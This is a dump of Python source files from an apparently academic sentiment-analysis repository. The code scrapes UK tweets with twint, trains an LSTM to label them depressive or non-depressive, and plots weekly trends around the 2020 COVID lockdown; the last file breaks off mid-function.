repo_name
stringclasses
400 values
branch_name
stringclasses
4 values
file_content
stringlengths
16
72.5k
language
stringclasses
1 value
num_lines
int64
1
1.66k
avg_line_length
float64
6
85
max_line_length
int64
9
949
path
stringlengths
5
103
alphanum_fraction
float64
0.29
0.89
alpha_fraction
float64
0.27
0.89
olof98johansson/SentimentAnalysisNLP
refs/heads/main
import torch
import torch.nn as nn
import os
import numpy as np


class ModelUtils:
    '''
    A utility class to save and load model weights
    '''

    @staticmethod
    def save_model(save_path, model):
        '''
        Saves the model's state dict to ``save_path``.

        Input: save_path - target file path; a '.pth' extension is appended
                           when missing (type: string)
               model - the model whose weights are saved (type: nn.Module)
        '''
        root, ext = os.path.splitext(save_path)
        if not ext:
            save_path = root + '.pth'
        try:
            torch.save(model.state_dict(), save_path)
            print(f'Successfully saved to model to "{save_path}"!')
        except Exception as e:
            print('Unable to save model, check save path!')
            print(f'Exception:\n{e}')
            return None

    @staticmethod
    def load_model(load_path, model):
        '''
        Loads weights from ``load_path`` into ``model`` in place.

        Input: load_path - path to a saved state dict (type: string)
               model - a model with a matching architecture (type: nn.Module)
        '''
        try:
            model.load_state_dict(torch.load(load_path))
            print(f'Successfully loaded the model from path "{load_path}"')
        except Exception as e:
            print('Unable to load the weights, check if different model or incorrect path!')
            print(f'Exception:\n{e}')
            return None


class RNNModel(nn.Module):
    '''
    RNN classifier with different available RNN types (basic RNN, LSTM, GRU)
    '''

    def __init__(self, rnn_type, nr_layers, voc_size, emb_dim, rnn_size,
                 dropout, n_classes):
        '''
        Initiates the RNN model

        Input: rnn_type - specifies the rnn model type between "rnn", "lstm" or "gru" (type: string)
               nr_layers - number of rnn layers (type: int)
               voc_size - size of vocabulary of the encoded input data (type: int)
               emb_dim - size of embedding layer (type: int)
               rnn_size - number of hidden units in the RNN model (type: int)
               dropout - probability of dropout layers (type: float in between [0, 1])
               n_classes - number of different classes/labels (type: int)

        Raises: ValueError - if rnn_type is not one of "rnn", "lstm" or "gru"
        '''
        super().__init__()
        self.rnn_size = rnn_size
        self.rnn_type = rnn_type
        self.nr_layers = nr_layers
        self.embedding = nn.Embedding(voc_size, emb_dim)

        rnn_classes = {'rnn': nn.RNN, 'lstm': nn.LSTM, 'gru': nn.GRU}
        if rnn_type not in rnn_classes:
            # Fix: the original only printed here and left self.rnn undefined,
            # which crashed later in forward(); fail fast instead.
            raise ValueError('Invalid or no choice for RNN type, please choose one of "rnn", "lstm" or "gru"')
        self.rnn = rnn_classes[rnn_type](input_size=emb_dim,
                                         hidden_size=rnn_size,
                                         # inter-layer dropout is only defined
                                         # for stacked (>1 layer) RNNs
                                         dropout=dropout if nr_layers > 1 else 0,
                                         bidirectional=False,
                                         num_layers=nr_layers,
                                         batch_first=True)
        self.dropout = nn.Dropout(dropout)
        self.linear = nn.Linear(in_features=rnn_size, out_features=n_classes)
        self.sigmoid = nn.Sigmoid()

    def forward(self, X, hidden):
        '''
        Forward propagation of the RNN model

        Input: X - batch of input data, shape (batch, seq) of token ids (type: torch tensor)
               hidden - initial hidden state as produced by init_hidden()
                        ((h, c) tuple for lstm, tensor otherwise)

        Output: out - model prediction for the last time step, shape (batch,) (type: torch tensor)
                hidden - output of the hidden cells (type: torch tensor or tuple)
        '''
        self.batch_size = X.size(0)
        embedded = self.embedding(X)
        # The rnn/lstm branches in the original were byte-identical; a single
        # call works for every type because init_hidden() now produces the
        # structure each cell type expects.
        rnn_out, hidden = self.rnn(embedded, hidden)
        rnn_out = rnn_out.contiguous().view(-1, self.rnn_size)
        drop = self.dropout(rnn_out)
        out = self.linear(drop)
        out = self.sigmoid(out)
        # reshape such that batch size is first and keep the last time step
        out = out.view(self.batch_size, -1)
        out = out[:, -1]
        return out, hidden

    def init_hidden(self, batch_size, device):
        '''
        Initializes the hidden state with zeros.

        Returns an (h0, c0) tuple for lstm; a single tensor for rnn/gru.
        Fix: the original always returned a tuple, but nn.RNN/nn.GRU expect a
        plain tensor, so those types failed at the first forward() call.
        '''
        h0 = torch.zeros((self.nr_layers, batch_size, self.rnn_size)).to(device)
        if self.rnn_type != 'lstm':
            return h0
        c0 = torch.zeros((self.nr_layers, batch_size, self.rnn_size)).to(device)
        return (h0, c0)
Python
119
36.705883
113
/models.py
0.58196
0.578396
olof98johansson/SentimentAnalysisNLP
refs/heads/main
import data_cleaning
import twint_scraping
import os
from collections import Counter
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
from torch.utils.data import Dataset, DataLoader
import torch


class config:
    '''
    Configuration class to store and tune global variables
    '''
    # Reserved vocabulary tokens for padding and out-of-vocabulary words.
    PAD = '___PAD___'
    UNKNOWN = '___UNKNOWN___'
    # One json file per scraping run; order matches `labels` below
    # (first six depressive, last six non-depressive).
    paths = ['./training_data/depressive1.json', './training_data/depressive2.json',
             './training_data/depressive3.json', './training_data/depressive4.json',
             './training_data/depressive5.json', './training_data/depressive6.json',
             './training_data/non-depressive1.json', './training_data/non-depressive2.json',
             './training_data/non-depressive3.json', './training_data/non-depressive4.json',
             './training_data/non-depressive5.json', './training_data/non-depressive6.json']
    labels = ['depressive', 'depressive', 'depressive', 'depressive',
              'depressive', 'depressive', 'not-depressive', 'not-depressive',
              'not-depressive', 'not-depressive', 'not-depressive', 'not-depressive']
    save_path = './training_data/all_training_data.csv'
    # One search keyword per collection run, aligned with `paths`.
    keywords = ['depressed', 'lonely', 'sad', 'depression', 'tired', 'anxious',
                'happy', 'joy', 'thankful', 'hope', 'hopeful', 'glad']
    nr_of_tweets = [5000, 5000, 5000, 5000, 5000, 5000,
                    5000, 5000, 5000, 5000, 5000, 5000]
    hashtags_to_remove = []
    # Filled in by preprocess(): fitted LabelEncoder, built Vocab and sizes,
    # so other modules (e.g. predict.py) can reuse them.
    encoder = None
    vocab = None
    vocab_size = 0
    n_classes = 0


def collect_dataset(paths, keywords, nr_of_tweets, hashtags_to_remove, collect=True):
    '''
    Collecting the dataset and cleans the data

    Input: paths - path to where to save the collected tweets (type: list of strings)
           keywords - keywords to be used for collecting tweets (type: list of strings)
           nr_of_tweets - number of tweets to be collected for each collecting process
                          (type: list of ints)
           collect - specifying if to collect tweets or not (type: boolean)

    Output: dataset - cleaned dataset of the tweet texts and their labels
                      (type: list of lists)
    '''
    roots, exts = [], []
    for path in paths:
        root, ext = os.path.splitext(path)
        roots.append(root)
        exts.append(ext)
    save_root, save_exts = os.path.splitext(config.save_path)
    # Normalize extensions: raw scrapes are json, the cleaned set is csv.
    json_paths = [root+'.json' for root in roots]
    csv_path = save_root+'.csv'
    if collect:
        for idx, json_path in enumerate(json_paths):
            twint_scraping.collect_tweets(keywords=keywords[idx],
                                          nr_tweets=nr_of_tweets[idx],
                                          output_file=json_path)
    dataset, keys = data_cleaning.datacleaning(paths=json_paths, labels=config.labels,
                                               hashtags_to_remove=hashtags_to_remove,
                                               save_path=csv_path)
    return dataset, keys


class DocumentDataset(Dataset):
    '''
    Basic class for creating dataset from the input and label data
    '''
    def __init__(self, X, Y):
        # X: encoded documents, Y: encoded labels (parallel sequences).
        self.X = X
        self.Y = Y

    def __getitem__(self, idx):
        return self.X[idx], self.Y[idx]

    def __len__(self):
        return len(self.X)


class DocumentBatcher:
    '''
    Process the batches to desired output by transform into torch tensors and
    pads uneven input text data to the same length
    '''
    def __init__(self, voc):
        # Pad with the vocabulary's dedicated padding index.
        self.pad = voc.get_pad_idx()

    def __call__(self, XY):
        # Pad every document up to the longest one in this batch.
        max_len = max(len(x) for x, _ in XY)
        Xpadded = torch.as_tensor([x + [self.pad] * (max_len - len(x)) for x, _ in XY])
        Y = torch.as_tensor([y for _, y in XY])
        return Xpadded, Y


class Vocab:
    '''
    Encoding the documents
    '''
    def __init__(self):
        # Splitting the tweets into words as tokenizer
        self.tokenizer = lambda s: s.split()

    def build_vocab(self, docs):
        '''
        Building the vocabulary from the documents, i.e creating the
        word-to-encoding and encoding-to-word dicts

        Input: docs - list of all the lines in the corpus
        '''
        freqs = Counter(w for doc in docs for w in self.tokenizer(doc))
        # Most frequent words get the lowest ids (after the reserved tokens).
        freqs = sorted(((f, w) for w, f in freqs.items()), reverse=True)
        self.enc_to_word = [config.PAD, config.UNKNOWN] + [w for _, w in freqs]
        self.word_to_enc = {w: i for i, w in enumerate(self.enc_to_word)}

    def encode(self, docs):
        '''
        Encoding the documents; unseen words map to the UNKNOWN index.

        Input: docs - list of all the lines in the corpus
        '''
        unkn_index = self.word_to_enc[config.UNKNOWN]
        return [[self.word_to_enc.get(w, unkn_index) for w in self.tokenizer(doc)] for doc in docs]

    def get_unknown_idx(self):
        # Index of the out-of-vocabulary placeholder token.
        return self.word_to_enc[config.UNKNOWN]

    def get_pad_idx(self):
        # Index of the padding token.
        return self.word_to_enc[config.PAD]

    def __len__(self):
        return len(self.enc_to_word)


def preprocess(batch_size=64, collect=True):
    '''
    Function for preprocessing the data which splits the data into train/val,
    builds the vocabulary, fits the label encoder and creates the dataloaders
    for the train and validation set

    Input: batch_size - batch size to be used in the data loaders (type: int)
           collect - specifying if to collect data or not (type: boolean)

    Output: dataloaders - the created data loaders for training and validation set
                          (type: list of data loaders)
            vocab_size - size of the built vocabulary (type: int)
            n_classes - number of classes/labels in the dataset
    '''
    data, keys = collect_dataset(paths=config.paths, keywords=config.keywords,
                                 nr_of_tweets=config.nr_of_tweets,
                                 hashtags_to_remove=config.hashtags_to_remove,
                                 collect=collect)
    X, Y = data
    # Fixed random_state so the same split is reproduced on every call
    # (predict.py relies on this to rebuild the identical vocab/encoder).
    x_train, x_val, y_train, y_val = train_test_split(X, Y, test_size=0.2,
                                                      shuffle=True, random_state=1)
    # Vocabulary is built on the training split only.
    vocab = Vocab()
    vocab.build_vocab(x_train)
    config.vocab = vocab
    encoder = LabelEncoder()
    encoder.fit(y_train)
    config.encoder = encoder
    vocab_size = len(vocab)
    n_classes = len(encoder.classes_)
    config.vocab_size = vocab_size
    config.n_classes = n_classes
    batcher = DocumentBatcher(vocab)
    train_dataset = DocumentDataset(vocab.encode(x_train), encoder.transform(y_train))
    train_loader = DataLoader(train_dataset, batch_size, shuffle=True,
                              collate_fn=batcher, drop_last=True)
    val_dataset = DocumentDataset(vocab.encode(x_val), encoder.transform(y_val))
    val_loader = DataLoader(val_dataset, batch_size, shuffle=True,
                            collate_fn=batcher, drop_last=True)
    dataloaders = [train_loader, val_loader]
    return dataloaders, vocab_size, n_classes
Python
197
34.411167
125
/preprocessing.py
0.61566
0.606069
olof98johansson/SentimentAnalysisNLP
refs/heads/main
import models
import train
import preprocessing
import data_cleaning
import os
import torch
import twint_scraping
import numpy as np
from torch.utils.data import Dataset, DataLoader
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
sns.set_style('darkgrid')
import pandas_alive


class Config:
    '''
    Configuration class to store and tune global variables
    '''
    test_set_keywords = []
    test_set_nr_of_tweets = [5000]
    # Coordinates spread out in UK to cover as wide geographical range as possible
    test_set_locations = ["54.251186,-4.463196,550km"]
    len_locations = len(test_set_locations)
    time_to = twint_scraping.get_weeks([2019, 12, 24], [2020, 3, 17])  # UK lockdown and 3 months back
    time_from = twint_scraping.get_weeks([2020, 3, 24], [2020, 6, 24])  # UK lockdown and 3 months forward
    # Weekly timespans: the "before" weeks followed by the "after" weeks.
    test_set_time_spans = []
    for tt in time_to:
        test_set_time_spans.append(tt)
    for tf in time_from:
        test_set_time_spans.append(tf)
    len_timespan = len(test_set_time_spans)
    # One json path per (timespan, location) pair.
    test_set_json_paths = []
    for t_idx in range(len_timespan):
        time_spec_path = []
        for l_idx in range(len_locations):
            time_spec_path.append(f'./forecast_data/testdata_{l_idx}_{t_idx}.json')
        test_set_json_paths.append(time_spec_path)
    test_set_csv_paths = [f'./forecast_data/all_loc_{t_idx}.csv' for t_idx in range(len_timespan)]
    path_to_weights = './weights/lstm_model_2.pth'


class TestDataset(Dataset):
    '''
    Basic class for creating dataset from the test input data
    '''
    def __init__(self, X):
        self.X = X

    def __getitem__(self, idx):
        return self.X[idx]

    def __len__(self):
        return len(self.X)


def get_testdata(paths, save_path, timespans, collect_test_data=False):
    '''
    Builds vocabulary and encoder based on the training data and collects,
    clean and builds data loaders for the test data

    Input: paths - path to store the collected test data with json extension (type: list of strings)
           save_path - path to where to save the cleaned and final test dataset with
                       csv extension (type: list of strings)
           timespans - timespans of when the collected test tweets where tweeted
                       (type: list of lists of strings)
           collect_test_data - specifying if to collect test data or not (type: boolean)

    Output: test_loader - data loader for the collected test data (type: DataLoader)
            encoder - encoder trained on the training labels (type: LabelEncoder)
            vocab_size - size of the vocabulary built from the training data (type: int)
            n_classes - number of classes/labels from the training data (type: int)
    '''
    roots, exts = [], []
    for path in paths:
        root, ext = os.path.splitext(path)
        roots.append(root)
        exts.append(ext)
    save_root, save_exts = os.path.splitext(save_path)
    json_paths = [root + '.json' for root in roots]
    csv_path = save_root + '.csv'
    # NOTE(review): here rnn_params is instantiated, while predict() below uses
    # the class object itself — presumably both expose the same attributes;
    # verify against train.rnn_params.
    rnn_params = train.rnn_params()
    # Re-runs preprocessing on the already-collected training data to rebuild
    # the vocabulary and label encoder stored on preprocessing.config.
    _, vocab_size, n_classes = preprocessing.preprocess(rnn_params.batch_size, collect=False)
    encoder = preprocessing.config.encoder
    vocab = preprocessing.config.vocab
    if collect_test_data:
        for idx, json_path in enumerate(json_paths):
            twint_scraping.collect_tweets(nr_tweets=Config.test_set_nr_of_tweets[idx],
                                          output_file=json_path,
                                          coord=Config.test_set_locations[idx],
                                          timespan=timespans)
    # train=False: no labels exist for scraped test tweets.
    testdata, keys = data_cleaning.datacleaning(paths=json_paths, labels=[],
                                                hashtags_to_remove=[],
                                                save_path=csv_path, train=False)
    cleaned_csv_path = save_root + '_cleaned.csv'
    df = pd.DataFrame(data={"test docs": testdata})
    df.to_csv(cleaned_csv_path, sep=',', index=False)
    pad = vocab.get_pad_idx()
    # NOTE(review): max_len is measured on the raw strings (character count)
    # but used below to pad the encoded token lists — this over-pads and looks
    # unintended; verify.
    max_len = max(len(x) for x in testdata)
    testdata = vocab.encode(testdata)
    testdata_padded = torch.as_tensor([x + [pad] * (max_len - len(x)) for x in testdata])
    test_dataset = TestDataset(testdata_padded)
    test_loader = DataLoader(test_dataset, batch_size=1)
    return test_loader, encoder, vocab_size, n_classes


def predict(testdata, path_to_weights, vocab_size, n_classes):
    '''
    Creates, loads and initiates the model and making predictions on the test data

    Input: testdata - data loader of the test data (type: DataLoader)
           path_to_weights - relative path and file name of the saved model weights
                             with .pth extension (type: string)
           vocab_size - size of the vocabulary (type: int)
           n_classes - number of labels/classes that can be predicted (type: int)

    Output: preds_prob_list - list of all the probabilities of which the model predicted
                              the corresponding label (type: list of floats)
            preds_status_list - list of all the reencoded labels that were predicted
                                (type: list of strings)
    '''
    rnn_params = train.rnn_params
    model = models.RNNModel(rnn_type=rnn_params.rnn_type, nr_layers=rnn_params.nr_layers,
                            voc_size=vocab_size, emb_dim=rnn_params.emb_dim,
                            rnn_size=rnn_params.rnn_size, dropout=rnn_params.dropout,
                            n_classes=n_classes)
    models.ModelUtils.load_model(path_to_weights, model)
    model.to(rnn_params.device)
    batch_size = 1
    h = model.init_hidden(batch_size, device=rnn_params.device)
    model.zero_grad()
    preds_prob_list, preds_status_list = [], []
    for x_test in testdata:
        x_test = x_test.to(train.rnn_params.device)
        # Detach the hidden state from the previous sample's graph.
        # NOTE(review): tuple(...) assumes an (h, c) LSTM hidden state; it
        # would not work for a plain rnn/gru hidden tensor — confirm rnn_type.
        h = tuple([each.data for each in h])
        out, h = model(x_test, h)
        # NOTE(review): `out` is rounded to 0/1 *before* thresholding, so
        # `prob` collapses to exactly 0.0 or 1.0 rather than the model's
        # probability — verify this is intended.
        pred = torch.round(out.squeeze()).item()
        pred_status = "depressive" if pred < 0.5 else "non-depressive"
        prob = (1-pred) if pred_status == "depressive" else pred
        preds_status_list.append(pred_status)
        preds_prob_list.append(prob)
    return preds_prob_list, preds_status_list


def run_predictions(collect_test_data=False):
    '''
    Collect, preprocess and predicts the test data

    Input: collect_test_data - whether or not to collect test data (type: boolean)

    Output: status_results - all the predicted labels (type: dictionary of lists of strings)
            preds_results - all the predicted values, i.e the certainties of the
                            predictions (type: dictionary of lists of strings)
    '''
    status_results = {}
    preds_results = {}
    for idx, ind_paths in enumerate(Config.test_set_json_paths):
        try:
            testdata, encoder, vocab_size, n_classes = get_testdata(ind_paths,
                                                                    Config.test_set_csv_paths[idx],
                                                                    timespans=Config.test_set_time_spans[idx],
                                                                    collect_test_data=collect_test_data)
            preds_list, preds_status_list = predict(testdata, Config.path_to_weights,
                                                    vocab_size, n_classes)
            status_results[f'timespan_{idx}'] = preds_status_list
            preds_results[f'timespan_{idx}'] = preds_list
        except Exception as e:
            # Abort the whole run on the first failing timespan.
            print(f'Unable to get test data!')
            print(f'Exception:\n{e}')
            return None
    return status_results, preds_results


def plot_predictions(status_results, preds_results, save_name='./predictions_forecast.png', color=None):
    '''
    Plot the predictions in time order, i.e a time-based forecast of the predictions

    Input: status_results - all the predicted labels (type: dictionary of lists of strings)
           preds_results - all the predicted values, i.e the certainties of the
                           predictions (type: dictionary of lists of strings)
           save_name - path and filename to where to save the forecasting plot
           color - optional bar color override (type: string or None)
    '''
    timespans = list(status_results.keys())
    nr_depressive = [(np.array(status_results[timespans[t_idx]]) == 'depressive').sum()
                     for t_idx in range(len(timespans))]
    # Fraction of tweets classified depressive per weekly timespan.
    percentage_dep = [((np.array(status_results[timespans[t_idx]]) == 'depressive').sum())/len(status_results[timespans[t_idx]])
                      for t_idx in range(len(timespans))]
    text_perc_dep = [format(percentage_dep[i]*100, '.2f') for i in range(len(percentage_dep))]
    ave_probs = [np.mean(np.array(preds_results[timespans[t_idx]])) for t_idx in range(len(timespans))]
    text_ave_probs = [format(ave_probs[i]*100, '.2f') for i in range(len(ave_probs))]
    weeks = Config.test_set_time_spans
    # Two-line tick labels: week start date over week end date.
    indexes = [f'{w[0].split()[0]}\n{w[1].split()[0]}' for w in weeks]
    if color:
        color_bar = color
    else:
        color_bar = "#ff3399"
    if not len(indexes) == len(percentage_dep):
        # Fall back to the raw timespan keys when the global Config no longer
        # matches the results being plotted.
        print('Time indexes does not equal number of values')
        indexes = timespans
    fig = plt.figure(figsize=(28, 12))
    plt.bar(indexes, percentage_dep, color=color_bar, width=0.55, alpha=0.35)
    plt.plot(indexes, percentage_dep, color="#cc99ff", alpha=0.5)
    for i, p in enumerate(percentage_dep):
        plt.text(indexes[i], p + 0.02, f'{text_perc_dep[i]}%', verticalalignment='center',
                 color='black', horizontalalignment='center', fontweight='bold', fontsize=8)
    plt.xlabel('Time period', fontsize=16)
    plt.ylabel('Percentage %', fontsize=16)
    plt.ylim(-0.05, 0.5)
    plt.xticks(fontsize=7.4)
    plt.yticks(fontsize=11)
    plt.title(f'Percentage of depressive tweets weekly from {indexes[0].split()[0]} to {indexes[len(indexes)-1].split()[1]}',
              fontsize=20)
    if save_name:
        root, ext = os.path.splitext(save_name)
        save_name = root + '.png'
        plt.savefig(save_name, bbox_inches='tight')
    plt.show()


def plot_all_predictions(status_results1, status_results2, status_results3, weeks,
                         save_name='./predictions_forecast.png', colors=None):
    '''
    Plot the three time periods' weekly depressive percentages side by side
    as grouped bars for comparison.

    Input: status_results1..3 - predicted labels per period (type: dict of lists of strings)
           weeks - the three periods' weekly timespans (type: list of three lists)
           save_name - path for the saved figure (type: string)
           colors - three bar colors, one per period (type: list of strings)
    '''
    timespans1 = list(status_results1.keys())
    timespans2 = list(status_results2.keys())
    timespans3 = list(status_results3.keys())
    percentage_dep1 = [((np.array(status_results1[timespans1[t_idx]]) == 'depressive').sum())/len(status_results1[timespans1[t_idx]])
                       for t_idx in range(len(timespans1))]
    percentage_dep2 = [((np.array(status_results2[timespans2[t_idx]]) == 'depressive').sum())/len(status_results2[timespans2[t_idx]])
                       for t_idx in range(len(timespans2))]
    percentage_dep3 = [((np.array(status_results3[timespans3[t_idx]]) == 'depressive').sum())/len(status_results3[timespans3[t_idx]])
                       for t_idx in range(len(timespans3))]
    weeks1, weeks2, weeks3 = weeks
    indexes1 = [f'{w[0].split()[0]}\n{w[1].split()[0]}' for w in weeks1]
    indexes2 = [f'{w[0].split()[0]}\n{w[1].split()[0]}' for w in weeks2]
    indexes3 = [f'{w[0].split()[0]}\n{w[1].split()[0]}' for w in weeks3]
    x = np.arange(len(indexes1))
    lengths = [len(indexes1), len(indexes2), len(indexes3)]
    if not all(l == lengths[0] for l in lengths):
        # Truncate all three series to the shortest so the bars align.
        shortest = np.min(lengths)
        percentage_dep1 = percentage_dep1[:shortest]
        percentage_dep2 = percentage_dep2[:shortest]
        percentage_dep3 = percentage_dep3[:shortest]
        x = np.arange(shortest)
    fig = plt.figure(figsize=(28, 12))
    plt.bar(x-0.2, percentage_dep1, color=colors[0], width=0.2, alpha=0.4,
            label=f'{indexes1[0].split()[0]} to {indexes1[len(indexes1)-1].split()[1]}')
    plt.bar(x, percentage_dep2, color=colors[1], width=0.2, alpha=0.4,
            label=f'{indexes2[0].split()[0]} to {indexes2[len(indexes2) - 1].split()[1]}')
    plt.bar(x+0.2, percentage_dep3, color=colors[2], width=0.2, alpha=0.4,
            label=f'{indexes3[0].split()[0]} to {indexes3[len(indexes3) - 1].split()[1]}')
    plt.xlabel('Time periods', fontsize=16)
    plt.ylabel('Percentage %', fontsize=16)
    plt.ylim(-0.05, 0.5)
    plt.yticks(fontsize=12)
    plt.tick_params(
        axis='x',          # changes apply to the x-axis
        which='both',      # both major and minor ticks are affected
        bottom=False,      # ticks along the bottom edge are off
        top=False,         # ticks along the top edge are off
        labelbottom=False)
    plt.legend(fontsize=21)
    plt.title(f'Comparison of the percentage of depressive tweets weekly from for different time periods',
              fontsize=20)
    if save_name:
        root, ext = os.path.splitext(save_name)
        save_name = root + '.png'
        plt.savefig(save_name, bbox_inches='tight')
    plt.show()


def forecast_bar_race(status_results, preds_results, save_name='./plots/forecast_bar_race.mp4'):
    '''
    Render an animated (pandas_alive) pie chart of the weekly ratio between
    depressive and non-depressive predictions, saved as a gif.

    Input: status_results - all the predicted labels (type: dictionary of lists of strings)
           preds_results - all the predicted values (type: dictionary of lists of strings)
           save_name - output path; the extension is replaced with .gif
    '''
    timespans = list(status_results.keys())
    nr_depressive = [(np.array(status_results[timespans[t_idx]]) == 'depressive').sum()
                     for t_idx in range(len(timespans))]
    nr_nondepressive = [(np.array(status_results[timespans[t_idx]]) == 'non-depressive').sum()
                        for t_idx in range(len(timespans))]
    percentage_dep = [((np.array(status_results[timespans[t_idx]]) == 'depressive').sum()) / len(status_results[timespans[t_idx]])
                      for t_idx in range(len(timespans))]
    text_perc_dep = [format(percentage_dep[i] * 100, '.2f') for i in range(len(percentage_dep))]
    ave_probs = [np.mean(np.array(preds_results[timespans[t_idx]])) for t_idx in range(len(timespans))]
    text_ave_probs = [format(ave_probs[i] * 100, '.2f') for i in range(len(ave_probs))]
    percentage_antidep = [1 - percentage_dep[i] for i in range(len(percentage_dep))]
    df_dict = {'depressive': percentage_dep,
               'non-depressive': percentage_antidep}
    weeks = Config.test_set_time_spans
    # One date label (week start) per timespan, used as the animation index.
    indexes = [f'{w[0].split()[0]}' for w in weeks]
    predictions_df = pd.DataFrame(df_dict, index=pd.DatetimeIndex(indexes))
    predictions_df.index.rename('date', inplace=True)
    root, ext = os.path.splitext(save_name)
    save_name = root + '.gif'
    save_name_pie = root + '.gif'
    #predictions_df.plot_animated(filename=save_name, period_fmt="%Y-%m-%d")
    predictions_df.plot_animated(filename=save_name_pie, period_fmt="%Y-%m-%d",
                                 period_label={'x': 0, 'y': 0.05},
                                 title=f'Weekly ratio between non-depressive and depressive tweets in the UK',
                                 kind="pie", rotatelabels=True)


def run():
    '''
    Predict function to run the prediction process after specifying parameters
    for all three time periods
    '''
    # Point the training-data config at the already-collected training set so
    # get_testdata() can rebuild the vocabulary and label encoder.
    preprocessing.config.paths = ['./training_data/depressive1.json', './training_data/depressive2.json',
                                  './training_data/depressive3.json', './training_data/depressive4.json',
                                  './training_data/depressive5.json', './training_data/depressive6.json',
                                  './training_data/non-depressive1.json', './training_data/non-depressive2.json',
                                  './training_data/non-depressive3.json', './training_data/non-depressive4.json',
                                  './training_data/non-depressive5.json', './training_data/non-depressive6.json']
    preprocessing.config.labels = ['depressive', 'depressive', 'depressive', 'depressive',
                                   'depressive', 'depressive', 'not-depressive', 'not-depressive',
                                   'not-depressive', 'not-depressive', 'not-depressive', 'not-depressive']
    preprocessing.config.save_path = './training_data/all_training_data.csv'

    # Period 1: around the UK lockdown (Config defaults).
    status_results, preds_results = run_predictions(collect_test_data=True)  # collect_test_data=False if already collected
    plot_predictions(status_results, preds_results, save_name='./plots/forecast_orig.png')
    forecast_bar_race(status_results, preds_results, save_name='./plots/forecast_bar_race_orig.gif')
    week1 = Config.test_set_time_spans

    # comparing to same period year before
    Config.time_to = twint_scraping.get_weeks([2018, 12, 24], [2019, 3, 24])
    Config.time_from = twint_scraping.get_weeks([2019, 3, 24], [2019, 6, 24])
    test_set_time_spans = []
    for tt in Config.time_to:
        test_set_time_spans.append(tt)
    for tf in Config.time_from:
        test_set_time_spans.append(tf)
    len_timespan = len(test_set_time_spans)
    Config.test_set_time_spans = test_set_time_spans
    Config.len_timespan = len_timespan
    test_set_json_paths = []
    for t_idx in range(len_timespan):
        time_spec_path = []
        for l_idx in range(Config.len_locations):
            time_spec_path.append(f'./forecast_data/testdata_yearbefore_{l_idx}_{t_idx}.json')
        test_set_json_paths.append(time_spec_path)
    Config.test_set_json_paths = test_set_json_paths
    Config.test_set_csv_paths = [f'./forecast_data/all_loc_year_before_{t_idx}.csv'
                                 for t_idx in range(len_timespan)]
    week2 = Config.test_set_time_spans
    status_results_before, preds_results_before = run_predictions(collect_test_data=True)  # collect_test_data=False if already collected
    plot_predictions(status_results_before, preds_results_before,
                     save_name='./plots/forecast_year_before.png', color="#3366ff")
    forecast_bar_race(status_results_before, preds_results_before,
                      save_name='./plots/forecast_bar_race_last_year.gif')

    # Comparing to from 3 months after lockdown to recent
    Config.time_to = twint_scraping.get_weeks([2020, 6, 24], [2020, 9, 24])
    Config.time_from = twint_scraping.get_weeks([2020, 9, 24], [2020, 12, 17])
    test_set_time_spans = []
    for tt in Config.time_to:
        test_set_time_spans.append(tt)
    for tf in Config.time_from:
        test_set_time_spans.append(tf)
    len_timespan = len(test_set_time_spans)
    Config.test_set_time_spans = test_set_time_spans
    Config.len_timespan = len_timespan
    test_set_json_paths = []
    for t_idx in range(len_timespan):
        time_spec_path = []
        for l_idx in range(Config.len_locations):
            time_spec_path.append(f'./forecast_data/testdata_uptorecent_{l_idx}_{t_idx}.json')
        test_set_json_paths.append(time_spec_path)
    Config.test_set_json_paths = test_set_json_paths
    Config.test_set_csv_paths = [f'./forecast_data/all_loc_up_to_recent_{t_idx}.csv'
                                 for t_idx in range(len_timespan)]
    week3 = Config.test_set_time_spans
    status_results_uptonow, preds_results_uptonow = run_predictions(collect_test_data=True)  # collect_test_data=False if already collected
    plot_predictions(status_results_uptonow, preds_results_uptonow,
                     save_name='./plots/forecast_up_to_now.png', color="#00cc66")
    forecast_bar_race(status_results_uptonow, preds_results_uptonow,
                      save_name='./plots/forecast_bar_race_up_to_now.gif')

    ##### COMPARISON #####
    weeks = [week1, week2, week3]
    colors = ["#ff3399", "#3366ff", "#00cc66"]
    plot_all_predictions(status_results, status_results_before, status_results_uptonow,
                         weeks, save_name='./plots/comparison.png', colors=colors)


# NOTE(review): the full scraping + prediction pipeline runs on import;
# consider guarding with `if __name__ == '__main__':`.
run()
Python
410
46.358536
170
/predict.py
0.629879
0.611803
olof98johansson/SentimentAnalysisNLP
refs/heads/main
import json import csv import re def load_json(path): ''' Loads collected data in json format, checks it and then converts to csv format Input: path - path and file name to the collected json data (type: string) Output: keys - list of features/keys of the dataframe (type: list of strings) df_list - list containing all the dataframes from the json data (type: list of dataframes) ''' if not path.endswith('.json'): print('File path not JSON file...') return None with open(path, 'r', encoding='utf8') as handle: df_list = [json.loads(line) for line in handle] nr_keys = [len(df_list[i].keys()) for i in range(len(df_list))] if not all(k == nr_keys[0] for k in nr_keys): print('Some features missing, review the data!') return None else: keys = df_list[0].keys() return keys, df_list def combine_and_label(paths, labels, train=True): ''' Combining multiple collections of data files and adds corresponding label (i.e depressive or non-depressive). List of labels in correct order with respect to the paths order must be specified manually Input: paths - list containing all the paths to the json files (type: list of strings) labels - list containing all the labels to the corresponding json files (type: list of strings) Output: df_list - list of all the combined dataframes from the json data (type: list of dataframes) ''' if not type(paths)==type(list()): print('"paths" argument is not of type list! 
Please pass list of the paths to the collected data to be combined!') return None if train: if not len(paths) == len(labels): print(f'Number of datafile paths of {len(paths)} is not the same as number of labels of {len(labels)}!') return None df_list = [] for idx, path in enumerate(paths): try: curr_keys, curr_df_list = load_json(path) except Exception as e: print(f'Unable to load data from path "{path}", check path name and file!') print(f'Exception:\n{e}') return None for df in curr_df_list: if train: df['label'] = labels[idx] df_list.append(df) return df_list def datacleaning(paths, labels, hashtags_to_remove = [], save_path=None, train=True): ''' Cleans the data based on unwanted hashtags, duplication of tweets occured due to sharing of keywords, removal of mentions, urls, non-english alphabetic tokens and empty tweets obtained after cleaning Input: paths - list containing all the paths to the json files (type: list of strings) labels - list containing all the labels to the corresponding json files (type: list of strings) hashtags_to_remove - list containing hashtags wished to be removed (type: list of strings) save_path - path and file name to were to save the cleaned dataset (type: string or None) train - specify if it is training mode or not, i.e if to use labels or not (type: boolean) Output: dataset_doc - list of all the text documents and corresponding labels if train (type: list of strings) keys - list of features/keys of the dataframe (type: list of strings) ''' if len(labels) > 0: train = True df_list = combine_and_label(paths, labels, train=train) # Remove tweets with specific hashtags nr_removed_tweets = 0 for idx, 